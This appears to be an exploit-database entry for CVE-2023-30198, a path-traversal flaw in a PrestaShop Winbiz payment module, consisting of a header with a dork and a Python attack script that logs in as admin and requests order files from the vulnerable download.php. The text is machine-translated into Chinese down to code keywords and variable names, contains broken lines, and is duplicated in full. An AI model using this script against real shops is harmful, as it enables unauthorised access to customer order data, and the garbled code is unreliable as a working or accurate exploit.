#利用标题: Prestashop Winbiz付款模块- 路径名的不当限制到限制目录
#日期: 2023-06-20
#Dork:/modules/winbizpayment/downloads/download.php
#Country:伊朗
#利用作者: Amirhossein Bahramizadeh
#类别: WebApps
#供应商homepage3360 https://shop.webbax.ch/modules-pour...op-winbiz-winbiz-payment-payment-reverse.html
#版本: 17.1.3(必需)
#在: Windows/Linux上测试
#CVE : CVE-2023-30198
导入请求
导入字符串
导入随机
#脆弱网站的基本网址
base_url='http://example.com'
#登录页面的URL
login_url=base_url +'/authentication.php'
#管理帐户的用户名和密码
用户名='admin'
密码='密码123'
#脆弱的下载.php文件的URL
download_url=base_url +'/modules/winbizpayment/downloads/download.php'
#下载订单的ID
order_id=1234
#保存下载文件的路径
file_path='/tmp/order_%D.pdf'%order_id
#用于请求的会话cookie
session_cookies=无
#为CSRF令牌生成一个随机字符串
csrf_token=''。
#将邮政请求发送到登录页面以进行身份验证作为管理员用户
login_data={'email':用户名,'passwd':密码,'csrf_token': csrf_token}
session=requests.session()
响应=session.post(login_url,data=login_data)
#保存会话cookie以供将来的请求
session_cookies=session.cookies.get_dict()
#为CSRF令牌生成一个随机字符串
csrf_token=''。
#将发布请求发送到下载.php文件以下载订单PDF
download_data={'id_order': order_id,'csrf_token': csrf_token}
响应=session.post(download_url,cookies=session_cookies,data=download_data)
#将下载的文件保存到磁盘
使用open(file_path,'wb')为f:
f.Write(响应)
#打印一条消息,指示该文件已下载
打印(“下载到%s'%file_path)的文件)
#日期: 2023-06-20
#Dork:/modules/winbizpayment/downloads/download.php
#Country:伊朗
#利用作者: Amirhossein Bahramizadeh
#类别: WebApps
#供应商homepage3360 https://shop.webbax.ch/modules-pour...op-winbiz-winbiz-payment-payment-reverse.html
#版本: 17.1.3(必需)
#在: Windows/Linux上测试
#CVE : CVE-2023-30198
导入请求
导入字符串
导入随机
#脆弱网站的基本网址
base_url='http://example.com'
#登录页面的URL
login_url=base_url +'/authentication.php'
#管理帐户的用户名和密码
用户名='admin'
密码='密码123'
#脆弱的下载.php文件的URL
download_url=base_url +'/modules/winbizpayment/downloads/download.php'
#下载订单的ID
order_id=1234
#保存下载文件的路径
file_path='/tmp/order_%D.pdf'%order_id
#用于请求的会话cookie
session_cookies=无
#为CSRF令牌生成一个随机字符串
csrf_token=''。
#将邮政请求发送到登录页面以进行身份验证作为管理员用户
login_data={'email':用户名,'passwd':密码,'csrf_token': csrf_token}
session=requests.session()
响应=session.post(login_url,data=login_data)
#保存会话cookie以供将来的请求
session_cookies=session.cookies.get_dict()
#为CSRF令牌生成一个随机字符串
csrf_token=''。
#将发布请求发送到下载.php文件以下载订单PDF
download_data={'id_order': order_id,'csrf_token': csrf_token}
响应=session.post(download_url,cookies=session_cookies,data=download_data)
#将下载的文件保存到磁盘
使用open(file_path,'wb')为f:
f.Write(响应)
#打印一条消息,指示该文件已下载
打印(“下载到%s'%file_path)的文件)